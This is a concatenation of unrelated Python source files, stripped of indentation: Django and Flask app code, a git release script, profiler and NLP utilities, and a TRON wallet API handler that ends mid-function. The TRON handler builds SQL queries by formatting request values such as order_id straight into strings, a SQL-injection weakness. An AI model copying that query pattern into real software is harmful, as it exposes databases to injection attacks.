from dynamo3 import Binary
try:
from shutil import get_terminal_size # pylint: disable=E0611
def getmaxyx():
""" Get the terminal height and width """
size = get_terminal_size()
return size[1], size[0]
except ImportError:
try:
import os
from fcntl import ioctl
from termios import TIOCGWINSZ
import struct
def getmaxyx():
""" Get the terminal height and width """
try:
return int(os.environ["LINES"]), int(os.environ["COLUMNS"])
except KeyError:
height, width = struct.unpack("hhhh", ioctl(0, TIOCGWINSZ, 8 * "\000"))[
0:2
]
if not height or not width:
return 25, 80
return height, width
except ImportError:
# Windows doesn't have fcntl or termios, so fall back to defaults.
def getmaxyx():
""" Get the terminal height and width """
return 25, 80
def plural(value, append="s"):
""" Helper function for pluralizing text """
return "" if value == 1 else append
def unwrap(value):
""" Unwrap a quoted string """
return value[1:-1]
def resolve(val):
""" Convert a pyparsing value to the python type """
name = val.getName()
if name == "number":
try:
return int(val.number)
except ValueError:
return Decimal(val.number)
elif name == "str":
return unwrap(val.str)
elif name == "null":
return None
elif name == "binary":
return Binary(val.binary[2:-1])
elif name == "set":
if val.set == "()":
return set()
return set([resolve(v) for v in val.set])
elif name == "bool":
return val.bool == "TRUE"
elif name == "list":
return [resolve(v) for v in val.list]
elif name == "dict":
dict_val = {}
for k, v in val.dict:
dict_val[resolve(k)] = resolve(v)
return dict_val
elif name == "ts_function":
return dt_to_ts(eval_function(val.ts_function))
elif name == "ts_expression":
return dt_to_ts(eval_expression(val))
else:
raise SyntaxError("Unable to resolve value '%s'" % val)
def dt_to_ts(value):
""" If value is a datetime, convert to timestamp """
if not isinstance(value, datetime):
return value
return calendar.timegm(value.utctimetuple()) + value.microsecond / 1000000.0
def eval_function(value):
""" Evaluate a timestamp function """
name, args = value[0], value[1:]
if name == "NOW":
return datetime.utcnow().replace(tzinfo=tzutc())
elif name in ["TIMESTAMP", "TS"]:
return parse(unwrap(args[0])).replace(tzinfo=tzlocal())
elif name in ["UTCTIMESTAMP", "UTCTS"]:
return parse(unwrap(args[0])).replace(tzinfo=tzutc())
elif name == "MS":
return 1000 * resolve(args[0])
else:
raise SyntaxError("Unrecognized function %r" % name)
def eval_interval(interval):
""" Evaluate an interval expression """
kwargs = {
"years": 0,
"months": 0,
"weeks": 0,
"days": 0,
"hours": 0,
"minutes": 0,
"seconds": 0,
"microseconds": 0,
}
for section in interval[1:]:
name = section.getName()
if name == "year":
kwargs["years"] += int(section[0])
elif name == "month":
kwargs["months"] += int(section[0])
elif name == "week":
kwargs["weeks"] += int(section[0])
elif name == "day":
kwargs["days"] += int(section[0])
elif name == "hour":
kwargs["hours"] += int(section[0])
elif name == "minute":
kwargs["minutes"] += int(section[0])
elif name == "second":
kwargs["seconds"] += int(section[0])
elif name == "millisecond":
kwargs["microseconds"] += 1000 * int(section[0])
elif name == "microsecond":
kwargs["microseconds"] += int(section[0])
else:
raise SyntaxError("Unrecognized interval type %r: %s" % (name, section))
return relativedelta(**kwargs)
def eval_expression(value):
""" Evaluate a full time expression """
start = eval_function(value.ts_expression[0])
interval = eval_interval(value.ts_expression[2])
op = value.ts_expression[1]
if op == "+":
return start + interval
elif op == "-":
return start - interval
else:
raise SyntaxError("Unrecognized operator %r" % op)
|
import graphene
from graphene import relay
from rx import Observable
from channels import Group
from products.schemas import ProductNode
from products.models import Product
from graphene_django.filter import DjangoFilterConnectionField
def make_sub(info, gid):
inst = relay.Node.get_node_from_global_id(info, gid)
print("Instancia", inst)
try:
gp_name = 'gqp.{0}-updated.{1}'.format(str.lower(inst.__class__.__name__), inst.pk)
Group(gp_name).add(info.context.reply_channel)
info.context.channel_session['Groups'] = ','.join(
(gp_name, info.context.channel_session['Groups']))
except:
pass
return iter([inst])
class Query(graphene.ObjectType):
hello = graphene.String()
product = relay.node.Field(ProductNode, id=graphene.Int())
products = DjangoFilterConnectionField(ProductNode)
def resolve_hello(self, info, **kwargs):
return 'world'
class Subscription(graphene.ObjectType):
count_seconds = graphene.Int(up_to=graphene.Int())
sub_product = graphene.Field(
ProductNode, description='subscribe to updated product', id=graphene.Int())
def resolve_count_seconds(root, info, up_to=5):
return Observable.interval(1000)\
.map(lambda i: "{0}".format(i))\
.take_while(lambda i: int(i) <= up_to)
def resolve_sub_product(root, info, *args, **kwargs):
id = kwargs.get('id')
# print("KW", kwargs)
# print("args", args)
# product_object = Product.objects.get(pk=id)
# gp_name = 'gqp.{0}-updated.{1}'.format(
# str.lower(product_object.__class__.__name__), product_object.pk)
# print("gp_name", gp_name)
# print("info", info.context.__dict__)
# print("session", info.context.channel_session.__dict__)
# # context = info.return_type
# print("channel_layer", info.context.reply_channel.channel_layer.__dict__)
# Group(gp_name).add(info.context.reply_channel)
# channel_session = info.context.channel_session
#
# all_channels = [
# channel for channel in info.context.channel_layer.group_channels(gp_name)]
# print("all_channels", all_channels)
# info.context.channel_session.update(
# {'Groups': ','.join((gp_name, info.context.channel_session.get('Groups', '')))})
# print("channel_session", channel_session.__dict__)
def get_object(observer):
instance = Product.objects.get(pk=id)
return instance
return Observable.interval(1000) \
.map(lambda s: get_object(s)) \
.share()
# .create(get_object) \
schema = graphene.Schema(query=Query, subscription=Subscription)
|
from django import forms
from django.contrib.auth.models import User
from .models import Friend, RequestCall
class AddForm(forms.Form):
uname = forms.CharField(label="",widget=forms.TextInput(attrs={'autofocus':'on','autocomplete':'off','class':'form-control','placeholder':'Username of your friend'}))
|
from django.http.response import JsonResponse
from django.utils.translation import gettext as _
from django.contrib.auth.decorators import login_required, permission_required
from datetime import datetime
from app.base_views import MyViewCreateUpdateDelete
from .forms import *
from .tables import *
from .filters import *
from .models import *
class TypeOfServiceView(MyViewCreateUpdateDelete):
model = TypeOfService
form_class = TypeOfServiceForm
form_prefix = "typeofserviceform"
table_class = TypeOfServiceTable
filter_class = TypeOfServiceFilter
queryset = TypeOfService.objects.all()
template_name = "type_of_service/view.html"
page_title = _("Type Of Service")
page_title_icon = "file_invoice"
show_modal = False
class DomainView(MyViewCreateUpdateDelete):
model = Domain
form_class = DomainForm
form_prefix = "domainform"
table_class = DomainTable
filter_class = DomainFilter
queryset = Domain.objects.all()
template_name = "domain/view.html"
page_title = _("Domain")
page_title_icon = "file_invoice"
show_modal = False
def get_GET_data(self):
get_data = super().get_GET_data()
if get_data.get('acquisition_date') == "__/__/____":
get_data['acquisition_date'] = None
return get_data
def get_POST_data(self):
post_data = super().get_POST_data()
if post_data.get(self.form_prefix+'-acquisition_date', "__/__/____") == "__/__/____":
post_data[self.form_prefix+'-acquisition_date'] = None
return post_data
class ContractView(MyViewCreateUpdateDelete):
model = Contract
form_class = ContractForm
form_prefix = "contractform"
table_class = ContractTable
filter_class = ContractFilter
queryset = Contract.objects.all()
template_name = "contract/view.html"
page_title = _("Contract")
page_title_icon = "file_invoice"
show_modal = False
def get_GET_data(self):
get_data = super().get_GET_data()
if get_data.get('start_date') == "__/__/____":
get_data['start_date'] = None
return get_data
def get_POST_data(self):
post_data = super().get_POST_data()
if post_data.get(self.form_prefix+'-start_date', "__/__/____") == "__/__/____":
post_data[self.form_prefix+'-start_date'] = None
return post_data
class WebServiceView(MyViewCreateUpdateDelete):
model = WebService
form_class = WebServiceForm
form_prefix = "webserviceform"
table_class = WebServiceTable
filter_class = WebServiceFilter
queryset = WebService.objects.all()
template_name = "webservice/view.html"
page_title = _("Web Service")
page_title_icon = "file_invoice"
show_modal = False
@login_required
@permission_required('service.view_webservice')
def webservice_data_chart(request):
"""
Return a JsonResponse with data to fullfill a chart.
The return data consists in a series with all webservice divided by the type of service of the current year (divided by month).
If a month has nothing, so it will be sent 0.
Example:
"series": [
{
"name": "type_of_service_name",
"data": [9,9,9,9,9,9,0,0,0,0,0,0] # 12 months of data
},
{
"name": "type_of_service_name",
"data": [9,9,9,9,9,9,0,0,0,0,0,0] # 12 months of data
}
],
"labels": ["Jan", "Feb", "March",]
"""
current_date = datetime.today()
active_type_of_services = TypeOfService.objects.filter(active=True)
months = [i for i in range(1, 13)]
data = {
'series': [],
'labels': settings.CHART_MONTHS_LABELS,
'colors': [type_service.color for type_service in active_type_of_services]
}
for type_service in active_type_of_services:
services_count = []
for month in months:
services_count.append(
WebService.objects.filter(
date__month=month,
date__year=current_date.year,
type_of_service=type_service
).values('id').count()
)
data['series'].append({
"name": type_service.name,
"data": services_count,
})
return JsonResponse(data)
@login_required
@permission_required('service.view_domain')
def domain_data_chart(request):
"""Return a JsonResponse with domain data to fullfill a chart."""
current_date = datetime.today()
months = [i for i in range(1, 13)]
data = {
'series': [],
'labels': settings.CHART_MONTHS_LABELS,
}
domain_count = []
for month in months:
domain_count.append(
Domain.objects.filter(
acquisition_date__month=month,
acquisition_date__year=current_date.year,
).values('id').count()
)
data['series'].append({
"name": _("Domain"),
"data": domain_count,
})
return JsonResponse(data)
@login_required
@permission_required('service.view_contract')
def contract_data_chart(request):
"""Return a JsonResponse with contract data to fullfill a chart."""
current_date = datetime.today()
months = [i for i in range(1, 13)]
data = {
'series': [],
'labels': settings.CHART_MONTHS_LABELS,
}
contract_count = []
for month in months:
contract_count.append(
Contract.objects.filter(
start_date__month=month,
start_date__year=current_date.year,
).values('id').count()
)
data['series'].append({
"name": _("Contract"),
"data": contract_count,
})
return JsonResponse(data)
|
#!/usr/bin/env python3
import pytest
import json
import os
# git-python seems buggy (repo got corrupted) and hard to use
version_file = "./static/swagger.json"
# dont actually execute shell commands if True
DRY_RUN=False
# wrap os.system
def shell(cmd):
print(cmd)
if DRY_RUN: return
ret = os.system(cmd)
if ret != 0:
raise SystemError("'%s' returned %d" % (cmd, ret))
# 0. warn if local modifications
shell("[[ -z $(git status -s) ]] || echo 'WARNING: found modified/untracked files'")
# 1. ensure tests run ok
assert pytest.main() == pytest.ExitCode.OK
# 2. get current version from swagger
with open(version_file) as fp:
swagger = json.load(fp)
old_version_string = swagger["info"]["version"]
# bump patch version
version_numbers = [int(s) for s in old_version_string.split(".")]
version_numbers[2] = version_numbers[2] + 1
version_string = ".".join([str(n) for n in version_numbers])
print("Bumping version to %s" % version_string)
swagger["info"]["version"] = version_string
with open(version_file, "w") as fp:
json.dump(swagger, fp, indent=2)
# commit changed version
print("Committing version update")
shell("git add %s" % version_file)
shell("git commit -m \"[autorelease] v%s\"" % version_string)
# 4. tag and push
print("Tagging %s" % version_string)
shell("git tag -a -m \"[autorelease] tagging v%s\" %s" % (version_string, version_string))
print("Pushing bumped version and tag to origin")
shell("git push origin --follow-tags")
|
from __future__ import division
from six.moves import range
# LIBTBX_SET_DISPATCHER_NAME cbf.dump
import sys
def process(file_name, out=None):
if (out is None): out = sys.stdout
import pycbf
print >> out, "File name:", file_name
object = pycbf.cbf_handle_struct() # FIXME
object.read_file(file_name, pycbf.MSG_DIGEST)
object.rewind_datablock()
n_blocks = object.count_datablocks()
print >> out, "Number of blocks:", n_blocks
for i_block in range(n_blocks):
object.select_datablock(i_block)
print >> out, " Block name:", object.datablock_name()
object.rewind_category()
n_categories = object.count_categories()
print >> out, " Number of categories:", n_categories
for i_category in range(n_categories):
object.select_category(i_category)
print >> out, " Category name:", object.category_name()
print >> out
def run(args):
if (len(args) == 0):
from libtbx.utils import Usage
import libtbx.load_env
raise Usage("%s your.cbf ..." % libtbx.env.dispatcher_name)
for file_name in args:
process(file_name)
if (__name__ == "__main__"):
run(args=sys.argv[1:])
|
from ztag.annotation import *
class CiscoHTTPS(TLSTag):
protocol = protocols.HTTPS
subprotocol = protocols.HTTPS.TLS
port = None
tests = {
"cisco_ios_server":{
"global_metadata":{
"manufacturer":"Cisco",
},
"tags":["embedded",]
}
}
def process(self, obj, meta):
cn = obj["certificate"]["parsed"]["issuer"]["common_name"][0]
if "cisco" in cn.lower():
meta.global_metadata.manufacturer = Manufacturer.CISCO
meta.tags.add("embedded")
return meta
|
from typing import List
class State:
name: str
value: str
def __init__(self, name: str, value: str):
self.name = name
self.value = value
class File:
name: str
def __init__(self, name: str):
self.name = name
class Path:
state: List[State]
file: List[File]
def __init__(self):
self.state = []
self.file = []
def __len__(self):
return self.state.__len__(), self.file.__len__()
def append_state(self, obj: State) -> None:
self.state.append(obj)
return
def append_file(self, obj: File) -> None:
self.file.append(obj)
return
class ExternalEvent:
name: str
cname: str
external_id: str
path: List[Path]
# def __init__(self, name: str, eid: str = None):
# self.name = name
# self.external_id: str
# if eid is None:
# self.external_id = 'V' + name[5:]
# else:
# self.external_id = eid
# self.path = []
def __init__(self, name: str, cname: str, eid: str):
self.name = name
self.cname = cname
self.external_id = eid
self.path = []
def __len__(self):
return self.path.__len__()
def append_path(self, obj: Path) -> None:
self.path.append(obj)
return
class AudioModification:
name: str
external_event: List[ExternalEvent]
def __init__(self, name: str):
self.name = name
self.external_event = []
def __len__(self):
return self.external_event.__len__()
def append_external_event(self, obj: ExternalEvent) -> None:
self.external_event.append(obj)
return
|
tipos_de_classes = {
(1, 'Econômica'),
(2, 'Executiva'),
(3, 'Primeira Classe')
} |
from pluginnet.sun397.sun397 import sun397_data_transform_val, CrossEntropyLossOneHot
from pluginnet.sun397.metrics import create_softmax_metrics_dictionary
from pluginnet.sun397.partial_evidence import build_plugins, AlexNetPartialEvidence, SUN397PE
from pluginnet.sun397.sun397 import SUN397
import torchvision
import torch
import torchvision.models as models
import pandas as pd
def create_mode_pe(conf):
data_set, net, metrics_dict, aggregator = _create__alexnet_cross_entropy_model_pe(conf)
return data_set, net, metrics_dict, aggregator
def create_mode_base(conf):
data_set, net, metrics_dict, aggregator = _create__alexnet_cross_entropy_model_base(conf)
return data_set, net, metrics_dict, aggregator
def _create__alexnet_cross_entropy_model_base(conf):
def target_transform(x):
return x[-397:]
if conf['split'] == 'train':
conf['split_file'] = conf['split_file_train']
else:
conf['split_file'] = conf['split_file_test']
data_set = get_dataset_base(conf['dataset_root'], conf['split_file'], conf['split'],
conf['hierarchy_file'], use_fraction=conf.get('train_set_size'),
target_transform=target_transform, seed=conf.get('seed'))
net = models.__dict__['alexnet'](num_classes=397)
state_dict = torch.load(conf['base_model_file'])
net.load_state_dict(state_dict)
criterion = CrossEntropyLossOneHot()
aggregator = PredictionAggregatorSUN397(data_set.samples)
return data_set, net, create_softmax_metrics_dictionary(criterion), aggregator
def _create__alexnet_cross_entropy_model_pe(conf):
def target_transform(x): return x[-397:]
if conf['split'] == 'train':
conf['split_file'] = conf['split_file_train']
else:
conf['split_file'] = conf['split_file_test']
data_set = get_dataset(conf['dataset_root'], conf['split_file'], conf['split'],
conf['hierarchy_file'], use_fraction=conf.get('train_set_size'),
target_transform=target_transform, seed=conf.get('seed'))
base_net = models.__dict__['alexnet'](num_classes=397)
plugins = build_plugins(conf['plugins'])
net = AlexNetPartialEvidence(base_net, plugins)
state_dict = torch.load(conf['base_model_file'])
net.load_state_dict(state_dict)
criterion = CrossEntropyLossOneHot()
aggregator = PredictionAggregatorSUN397(data_set.samples)
return data_set, net, create_softmax_metrics_dictionary(criterion), aggregator
def get_dataset(dataset_root, split_file, split, hierarchy_file, data_transform=sun397_data_transform_val,
use_fraction=0, target_transform=None, seed=0):
if seed is None:
seed = 0
loader_f = torchvision.datasets.folder.pil_loader
if split == 'train':
data_set = SUN397PE(dataset_root, split_file, hierarchy_file, split='train',
validation_size=0, transform=data_transform,
target_transform=target_transform, loader=loader_f,
use_fraction=use_fraction, random_seed=seed)
else:
data_set = SUN397PE(dataset_root, split_file, hierarchy_file, split=split,
validation_size=10, transform=data_transform,
target_transform=target_transform)
return data_set
def get_dataset_base(dataset_root, split_file, split, hierarchy_file, data_transform=sun397_data_transform_val,
use_fraction=0, target_transform=None, seed=0):
if seed is None:
seed = 0
loader_f = torchvision.datasets.folder.pil_loader
if split == 'train':
data_set = SUN397(dataset_root, split_file, hierarchy_file, split='train',
validation_size=0, transform=data_transform,
target_transform=target_transform, loader=loader_f,
use_fraction=use_fraction, random_seed=seed)
else:
data_set = SUN397(dataset_root, split_file, hierarchy_file, split=split,
validation_size=10, transform=data_transform,
target_transform=target_transform)
return data_set
class PredictionAggregatorSUN397(object):
def __init__(self, files=None):
self.predictions = []
self.ground_truth = []
self.files = files
def __call__(self, engine):
self.add_result_(engine)
def add_result_(self, engine):
out = engine.state.output
self.predictions.extend(out[0].detach().cpu().numpy())
self.ground_truth.extend(out[1].detach().cpu().numpy())
def save_results(self, file_name):
predictions = pd.DataFrame(self.predictions)
gt = pd.DataFrame(self.ground_truth)
if self.files is not None:
predictions = predictions.set_index(pd.Index(self.files))
gt = gt.set_index(pd.Index(self.files))
results = pd.concat([predictions, gt], axis=1, keys=['predictions', 'ground_truth'])
results.to_hdf(file_name, key='results', mode='w')
|
from flask_login import UserMixin
from werkzeug.security import generate_password_hash, check_password_hash
from myweight import db
class EverydayWeight(db.Model): # 表名将会是 everydayweight(自动生成,小写处理)
id = db.Column(db.Integer, primary_key=True) # 主键
username = db.Column(db.String(20)) # 用户名
date = db.Column(db.DateTime)
weight = db.Column(db.Float)
class User(db.Model, UserMixin):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(20))
username = db.Column(db.String(20)) # 用户名
password_hash = db.Column(db.String(128)) # 密码散列值
def set_password(self, password): # 用来设置密码的方法,接受密码作为参数
self.password_hash = generate_password_hash(password) # 将生成的密码保持到对应字段
def validate_password(self, password): # 用于验证密码的方法,接受密码作为参数
return check_password_hash(self.password_hash, password) # 返回布尔值 |
import multiprocessing
import os
from scalene.scalene_profiler import Scalene
import sys
import threading
@Scalene.shim
def replacement_pjoin(scalene: Scalene):
def replacement_process_join(self, timeout: float = -1):
from multiprocessing.process import _children
# print(multiprocessing.process.active_children())
self._check_closed()
assert self._parent_pid == os.getpid(), 'can only join a child process'
assert self._popen is not None, 'can only join a started process'
tident = threading.get_ident()
if timeout < 0:
interval = sys.getswitchinterval()
else:
interval = min(timeout, sys.getswitchinterval())
start_time = scalene.get_wallclock_time()
while True:
scalene.set_thread_sleeping(tident)
res = self._popen.wait(timeout)
if res is not None:
_children.discard(self)
return
print(multiprocessing.process.active_children())
scalene.reset_thread_sleeping(tident)
if timeout != -1:
end_time = scalene.get_wallclock_time()
if end_time - start_time >= timeout:
_children.discard(self)
return
multiprocessing.Process.join = replacement_process_join
|
""" utility functions"""
import re
import os
from os.path import basename
import gensim
import torch
from torch import nn
PAD = 0
UNK = 1
START = 2
END = 3
def count_data(path):
""" count number of data in the given path"""
matcher = re.compile(r'[0-9]+\.json')
match = lambda name: bool(matcher.match(name))
names = os.listdir(path)
n_data = len(list(filter(match, names)))
return n_data
def make_vocab(wc, vocab_size):
word2id, id2word = {}, {}
word2id['<pad>'] = PAD
word2id['<unk>'] = UNK
word2id['<start>'] = START
word2id['<end>'] = END
for i, (w, _) in enumerate(wc.most_common(vocab_size), 4):
word2id[w] = i
return word2id
def make_embedding(id2word, w2v_file, emb_dim, initializer=None):
print("loading word vectors...")
w2v = gensim.models.Word2Vec.load(w2v_file).wv
vocab_size = len(id2word)
embedding = nn.Embedding(vocab_size, emb_dim).weight
if initializer is not None:
initializer(embedding)
oovs = []
with torch.no_grad():
for i in range(len(id2word)):
# NOTE: id2word can be list or dict
if i == START:
embedding[i, :] = torch.Tensor(w2v['<s>'])
elif i == END:
embedding[i, :] = torch.Tensor(w2v[r'<\s>'])
elif id2word[i] in w2v:
embedding[i, :] = torch.Tensor(w2v[id2word[i]])
else:
oovs.append(i)
return embedding, oovs
|
from django.test import SimpleTestCase
from django.urls import reverse, resolve
from orders.views import home, piechart, cohort, barchart, get_shipping_data, get_top3_products
class TestUrls(SimpleTestCase):
def test_home_url_resolves(self):
url = reverse('home')
self.assertEquals(resolve(url).func, home)
def test_piechart_url_resolves(self):
url = reverse('piechart')
self.assertEquals(resolve(url).func, piechart)
def test_cohort_url_resolves(self):
url = reverse('cohort')
self.assertEquals(resolve(url).func, cohort)
def test_barchart_url_resolves(self):
url = reverse('barchart')
self.assertEquals(resolve(url).func, barchart)
def test_get_shipping_data_url_resolves(self):
url = reverse('api-shipping-data')
self.assertEquals(resolve(url).func, get_shipping_data)
def test_get_top3_products_url_resolves(self):
url = reverse('api-top3-products')
self.assertEquals(resolve(url).func, get_top3_products) |
#!coding:utf8
#author:yqq
#date:2020/2/20 0020 17:29
#description: TRX 接口
import logging
from base_handler import BaseHandler
from utils import decimal_default, get_linenumber
import json
import sql
from utils import is_hex_str
import decimal
from decimal import Decimal
from decimal import getcontext
getcontext().prec = 30
from utils import RoundDown
from tronapi import Tron
from tronapi.trx import Trx
import logging
from pprint import pprint
import hashlib
from binascii import unhexlify, hexlify
TRON_RPC_URL = 'https://api.trongrid.io'
class TRX_SendRawTransaction(BaseHandler):
def get_order_from_db(self, order_id):
import sql
sqlRet = sql.run("select * from tb_trx_broadcast where order_id='{0}';".format(order_id))
if len(sqlRet) == 0: return (False, "", {})
txid = sqlRet[0]['txid']
tx_json = json.loads( sqlRet[0]['tx_json'] )
return (True, txid, tx_json)
def insert_txid_into_db(self, order_id, txid, tx_json_str):
import sql
strSql = """insert into tb_trx_broadcast(order_id, txid, tx_json) values('{}','{}', '{}');""".format(order_id, txid, tx_json_str)
logging.info('sql: {}'.format(strSql))
sqlRet = sql.run(strSql)
def post(self):
trx = Trx( Tron(full_node=TRON_RPC_URL, solidity_node=TRON_RPC_URL, event_server=TRON_RPC_URL) )
try:
signed_trx = self.get_argument_from_json("data")
order_id = self.get_argument_from_json("orderId")
is_exist, txid, tx_json = self.get_order_from_db(order_id)
if is_exist:
self.write(json.dumps(BaseHandler.success_ret_with_data(tx_json), default=decimal_default))
return
signed_trx_jsonobj = json.loads(signed_trx)
ret = trx.broadcast(signed_trx_jsonobj)
if 'result' in ret and ret['result'] == True:
self.write(json.dumps(BaseHandler.success_ret_with_data(ret), default=decimal_default))
#如果广播成功, 则插入数据库
if ret['result'] == True:
self.insert_txid_into_db(order_id=order_id, txid=ret['transaction']['txID'], tx_json_str=json.dumps(ret))
else:
errmsg = json.dumps(ret)
self.write(json.dumps(BaseHandler.error_ret_with_data(errmsg)))
except Exception as e:
logging.error("TRX_SendRawTransaction: {}".format(e))
self.write(json.dumps(BaseHandler.error_ret_with_data("error: %s" % e)))
pass
def get(self):
self.post()
pass
class TRX_CreateRawTransaction(BaseHandler):
@staticmethod
def my_encode_int64(num: int) -> str:
"""
将 int64 按照 protobuf 的编码方式编码
:param num: 输入的 int64
:return: 编码后的十六进制字符串
"""
# num = 1583290890000
assert num > 0
# 原码字符
raw = bin(num)[2:]
logging.info(f"原码: {raw}")
# 补码, 因为只处理正数, 所以 补码和原码相同
complement = raw
logging.info(f'补码: {complement}')
# 如果长度不是7的倍数, 则补0凑齐
tmp_complement = complement
if len(complement) % 7 != 0:
tmp_complement = '0' * (7 - (len(complement) % 7)) + complement
logging.info(f'补0后的补码: {tmp_complement}')
# 7位组 , 正序
seven_bit_array = []
i = len(tmp_complement) - 1
tmp = ''
while i >= 0:
tmp = tmp_complement[i] + tmp
if i % 7 == 0:
seven_bit_array.append(tmp)
tmp = ''
i -= 1
logging.info(f'正序7位组: { seven_bit_array[::-1] }')
logging.info(f'反序后7位组: {seven_bit_array}')
# 加上 MSB, 标识位
added_msb_seven_bit_array = []
for i in range(0, len(seven_bit_array)):
# 如果是最后一个7位组, 则 MSB标识位是 0, 否则 MSB标识位是 1
if i == len(seven_bit_array) - 1:
added_msb_seven_bit_array.append('0' + seven_bit_array[i])
else:
added_msb_seven_bit_array.append('1' + seven_bit_array[i])
logging.info(f'加上MSB标识位的7位组: {added_msb_seven_bit_array}')
# 最终的 二进制字符串形式
binstr = ''.join(added_msb_seven_bit_array)
logging.info(f'最终二进制形式:{binstr}')
# 十六进制字符串形式
hexstr = hex(int(binstr, 2))
logging.info(f'十六进制字符串形式: {hexstr}')
return hexstr[2:]
def modify_expiration(self, tx : dict):
"""
改变 tx['raw_data']['expiration']
同时也要修改 raw_data_hex , 和 txID
:param tx: (引用传入)传入传出参数
:return:
"""
old_expiration_hex = TRX_CreateRawTransaction.my_encode_int64(tx['raw_data']['expiration'])
# 改变 raw_data.expiration, 增加一个小时
tx['raw_data']['expiration'] += 3600 * 1000
new_expiration_hex = TRX_CreateRawTransaction.my_encode_int64(tx['raw_data']['expiration'])
# 也要改变 raw_data_hex 中相应的字段
raw_data_hex = str(tx['raw_data_hex'])
new_raw_data_hex = raw_data_hex.replace(old_expiration_hex, new_expiration_hex)
# old_txid = hashlib.sha256(unhexlify(tx['raw_data_hex'])).hexdigest()
new_txid = hashlib.sha256(unhexlify(new_raw_data_hex)).hexdigest()
# if old_txid == tx['txID']:
# logger.info('txid 比对成功!')
# pass
# else:
# pass
# logger.info('txid比对失败!')
tx['txID'] = new_txid
pass
def post(self):
try:
trx = Trx(Tron(full_node=TRON_RPC_URL, solidity_node=TRON_RPC_URL, event_server=TRON_RPC_URL))
src_acct = self.get_argument("src_acct")
dst_acct = self.get_argument("dst_acct")
stramount = self.get_argument("amount")
src_acct = src_acct.strip()
dst_acct = dst_acct.strip()
stramount = stramount.strip()
if len(src_acct) != 34 or (not str(src_acct).startswith('T') ):
raise Exception("invalid src address")
if len(dst_acct) != 34 or (not str(dst_acct).startswith('T') ):
raise Exception("invalid dst address")
amount = float(stramount)
tx = trx.tron.transaction_builder.send_transaction(
to=dst_acct,
amount= amount,
account=src_acct
)
self.modify_expiration(tx)
tx['signature'] = ['this_is_placeholder_for_signature']
rsp_data = {
'raw_trx_json_str' : json.dumps(tx),
'digest' : tx['txID']
}
logging.info(f'{rsp_data}')
self.write(json.dumps(BaseHandler.success_ret_with_data(rsp_data), default=decimal_default))
pass
except Exception as e:
logging.error("TRX_CreateRawTransaction: {}".format(e))
self.write(json.dumps(BaseHandler.error_ret_with_data("error: %s" % e)))
pass
def get(self):
self.post()
class TRX_CrawlTxData(BaseHandler):
def _GetDepositTxDataFromDB(self, startblock, endblock = (1<<64) - 1) -> list:
try:
if not (isinstance(startblock, int) and isinstance(endblock, int)):
logging.error("nBegin or nEnd is not int type.")
return []
txRet = []
startblock = startblock - 100 if startblock > 100 else 0
strSql = """SELECT * FROM tb_trx_deposit WHERE `block_number`>={} and `block_number`<={}; """.format( startblock, endblock)
logging.info("sql : {}".format(strSql))
# print(strSql)
sqlRet = sql.run(strSql)
# print(sqlRet)
if not isinstance(sqlRet, list):
return []
for item in sqlRet:
tx = {}
tx['symbol'] = item['symbol']
tx["txid"] = item['txid']
tx["from"] = item["from"]
tx["to"] = item["to"]
tx["blocktime"] = item['timestamp']
tx['blockNumber'] = item['block_number']
tx["confirmations"] = item['confirmations']
tx["value"] = item['amount']
txRet.append(tx)
return txRet
except Exception as e:
logging.error("GetTxDataInfoDB(nBegin, nEnd): {}".format( e))
return []
def post(self):
try:
startblock = int(self.get_argument("blknumber")) # 防止sql注入
if not str(startblock).isnumeric():
errmsg = "invalid `startblock`"
self.write(json.dumps(BaseHandler.success_ret_with_data(errmsg), default=decimal_default))
return
data = self._GetDepositTxDataFromDB(startblock)
self.write(json.dumps(BaseHandler.success_ret_with_data(data), default=decimal_default))
except Exception as e:
self.write(json.dumps(BaseHandler.error_ret_with_data("error: %s" % e)))
logging.error("error:{0} in {1}".format(e, get_linenumber()))
pass
def get(self):
self.post()
class TRX_GetAccountInfo(BaseHandler):
def post(self):
try:
address = self.get_argument("address")
if len(address) != 34 or (not str(address).startswith('T') ):
raise Exception("invalid address")
trx = Trx(Tron(full_node=TRON_RPC_URL, solidity_node=TRON_RPC_URL, event_server=TRON_RPC_URL))
account_info = trx.get_account(address=address)
if 'balance' in account_info:
decBalance = Decimal(account_info['balance']) / Decimal('1000000')
fmtBalance = decBalance.quantize(Decimal("0.000000"), getattr(decimal, 'ROUND_DOWN'))
else:
fmtBalance = '0.000000'
is_active = 'create_time' in account_info #账户是否已经激活
rsp_data = {
'address' : address,
'balance' : str(fmtBalance),
'active' : is_active
#其他代币资产信息可以根据资产id进行获取, 如TRC20-USDT , 此是后话
}
logging.info(f'{rsp_data}')
self.write(json.dumps(BaseHandler.success_ret_with_data(rsp_data), default=decimal_default))
pass
except Exception as e:
self.write(json.dumps(BaseHandler.error_ret_with_data("error: %s" % e)))
logging.error("error:{0} in {1}".format(e, get_linenumber()))
def get(self):
self.post()
pass
class TRX_GetBalance(BaseHandler):
def post(self):
try:
address = self.get_argument("address")
if len(address) != 34 or (not str(address).startswith('T') ):
raise Exception("invalid address")
trx = Trx(Tron(full_node=TRON_RPC_URL, solidity_node=TRON_RPC_URL, event_server=TRON_RPC_URL))
account_info = trx.get_account(address=address)
if 'balance' in account_info:
decBalance = Decimal(account_info['balance']) / Decimal('1000000')
fmtBalance = str( decBalance.quantize(Decimal("0.000000"), getattr(decimal, 'ROUND_DOWN')) )
else:
fmtBalance = '0.000000'
self.write(json.dumps(BaseHandler.success_ret_with_data(fmtBalance), default=decimal_default))
pass
except Exception as e:
self.write(json.dumps(BaseHandler.error_ret_with_data("error: %s" % e)))
logging.error("error:{0} in {1}".format(e, get_linenumber()))
def get(self):
self.post()
pass
class TRX_CollectionQuery(BaseHandler):
def process(self, symbol : str = 'TRX') -> list:
#每次只查部分地址, 以防http超时
strSql = f"""SELECT address FROM tb_trx_active_addrs WHERE `symbol`='{symbol}' AND `balance` >= 1 ORDER BY `balance` DESC LIMIT 25;"""
sqlRet = sql.run(strSql)
addrs = []
for item in sqlRet:
if "address" in item:
if item['address'] not in addrs: addrs.append(item["address"])
trx = Trx(Tron(full_node=TRON_RPC_URL, solidity_node=TRON_RPC_URL, event_server=TRON_RPC_URL))
retList = []
for addr in addrs:
account_info = trx.get_account(address=addr)
if 'balance' in account_info:
decBalance = Decimal(account_info['balance']) / Decimal('1000000')
fmtBalance = decBalance.quantize(Decimal("0.000000"), getattr(decimal, 'ROUND_DOWN'))
else:
fmtBalance = '0.000000'
if Decimal(fmtBalance) < Decimal( '1.0' ):
